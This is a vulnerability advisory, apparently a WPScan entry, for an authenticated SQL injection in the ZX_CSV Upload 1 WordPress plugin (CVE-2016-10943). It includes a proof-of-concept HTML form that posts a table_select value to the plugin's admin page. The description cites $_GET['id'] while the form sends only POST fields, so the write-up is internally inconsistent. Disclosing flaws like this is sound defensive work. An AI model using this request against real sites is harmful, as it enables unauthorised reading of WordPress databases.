ZX_CSV Upload 1 – Authenticated SQL Injection



Description
Type user access: admin user.

$_GET[‘id’] is not escaped. URL is accessible for every registered user.
Proof of Concept
1 – Login with admin user.

2 - Send request post:

<form action="http://www.example.com/wp-admin/admin.php?page=zx_csv_plugin_home" method="post">
    <input type="text" name="rsltsbmt" value="a">
    <input type="text" name="table_select" value="wp_terms">
    <input type="text" name="rsltfrom" value="0">
    <input type="text" name="rsltto" value="10">
    <input type="submit" name="">
</form>

Affects Plugin

References

CVE 2016-10943
URL http://lenonleite.com.br/en/blog/2016/12/16/english-zx_csv-upload-1-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 5309
Verified Yes
WPVDB ID 8702

Timeline

Publicly Published 2016-12-12 (almost 3 years ago)
Added 2016-12-20 (almost 3 years ago)
Last Updated 2019-09-14 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin